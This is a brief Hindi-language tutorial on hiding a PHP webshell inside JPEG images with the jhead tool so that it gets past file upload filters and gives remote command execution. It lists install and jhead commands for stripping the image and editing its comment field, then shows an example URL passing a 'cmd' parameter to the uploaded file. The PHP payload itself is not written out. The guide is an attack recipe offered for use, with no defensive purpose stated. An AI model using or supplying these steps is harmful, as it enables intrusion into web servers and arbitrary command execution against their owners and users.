
PHP स्क्रिप्ट और Jhead का उपयोग करके JPEG छवियों में PHP वेबशेल इंजेक्ट करने के लिए गाइड। फ़ाइल अपलोड फ़िल्टर को बायपास करने और निर्मित छवि फ़ाइलों के माध्यम से रिमोट कमांड निष्पादन प्राप्त करने के लिए उपयोग किया जाता है।
$ pkg install vim या apt-get install vim
$ pkg install jhead या apt-get install jhead
$ jhead -h (मदद के लिए)
$ jhead -purejpg yourfiles.jpg
$ jhead -ce yourfiles.jpg
बचाने के लिए ESC दबाएँ और :x टाइप करें
$ jhead yourfiles.jpg
उदाहरण : site.com/youfiles.php?cmd=Command Here
